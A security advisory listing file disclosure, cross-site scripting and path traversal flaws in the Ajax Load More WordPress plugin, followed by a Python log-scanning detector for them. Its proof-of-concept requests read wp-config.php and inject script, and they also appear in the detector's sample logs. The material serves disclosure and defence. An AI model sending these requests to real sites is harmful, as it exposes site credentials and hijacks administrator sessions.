Ajax Load More <= 5.5.3 Multiple Vulnerabilities
Authenticated Information Disclosure / Local File Disclosure:
The "ajax-load-more-repeaters" AJAX action is vulnerable to full path disclosure, since the full filesystem path of a file on the web server is visible in the request. An arbitrary filename can be supplied via the "alm_repeaters_export" parameter to view that file's contents. PoC for reading the WordPress configuration file:
POST /wp-admin/admin.php?page=ajax-load-more-repeaters
alm_repeaters_export=/var/www/html/wp-config.php
Vulnerable file: admin/admin.php
Authenticated Cross-Site Scripting:
PoC:
/wp-admin/admin-ajax.php?action=alm_get_tax_terms&taxonomy=post_tag&index=1"><script>alert(1)</script>&nonce={nonce}
The "index" parameter is not properly sanitized.
Vulnerable file: admin/admin.php

Authenticated Path traversal to arbitrary file read:
PoC:
/wp-admin/admin-ajax.php?action=alm_get_layout&repeater=default&type=./../../../../wp-config.php&custom=true&alias=&nonce={nonce}
/wp-admin/admin-ajax.php?action=alm_get_layout&repeater=default&type=./../../wp-config&alias=&nonce={nonce}
Vulnerable file: admin/admin.php
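
Detection sketch for the three request patterns above, as an added example that is not part of the original advisory or the plugin's code. The log lines are constructed samples, and the rules that a legitimate "type" is a plain slug and a legitimate "index" is numeric are assumptions, not taken from the plugin.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format), not from a real server.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/admin-ajax.php?action=alm_get_layout&repeater=default&type=default&custom=false&alias=&nonce=abc HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-admin/admin-ajax.php?action=alm_get_layout&repeater=default&type=./../../../../wp-config.php&custom=true&alias=&nonce=abc HTTP/1.1" 200 3301',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /wp-admin/admin-ajax.php?action=alm_get_tax_terms&taxonomy=post_tag&index=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E&nonce=abc HTTP/1.1" 200 840',
    '198.51.100.7 - - [01/Jan/2024:10:00:12 +0000] "POST /wp-admin/admin.php?page=ajax-load-more-repeaters HTTP/1.1" 200 3301',
    '198.51.100.7 - - [01/Jan/2024:10:00:20 +0000] "GET /wp-admin/admin-ajax.php?action=alm_get_tax_terms&taxonomy=post_tag&index=1&nonce=abc HTTP/1.1" 200 840',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
SLUG_RE = re.compile(r"^[A-Za-z0-9_-]*$")  # assumption: valid `type` is a plain slug
INDEX_RE = re.compile(r"^\d*$")            # assumption: valid `index` is numeric


def classify(line):
    """Return a finding label for one access-log line, or None if it looks normal."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    # parse_qs percent-decodes, so encoded payloads (%2e%2e%2f, %3Cscript) are
    # compared in decoded form; the allowlists also reject any leftover '%'.
    params = {k: v[-1] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    if url.path.endswith("/admin-ajax.php"):
        action = params.get("action")
        if action == "alm_get_layout" and not SLUG_RE.match(params.get("type", "")):
            return "alm_get_layout: path characters in type"
        if action == "alm_get_tax_terms" and not INDEX_RE.match(params.get("index", "")):
            return "alm_get_tax_terms: non-numeric index"
    if (m.group("method") == "POST" and url.path.endswith("/admin.php")
            and params.get("page") == "ajax-load-more-repeaters"):
        # The body is not in access logs; check it for alm_repeaters_export.
        return "repeaters export POST: inspect body"
    return None


def scan(lines):
    """Return (line_number, label) for every flagged line, numbering from 1."""
    return [(n, label) for n, line in enumerate(lines, 1)
            if (label := classify(line)) is not None]


if __name__ == "__main__":
    for n, label in scan(SAMPLE_LOG):
        print(f"line {n}: {label}")
```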
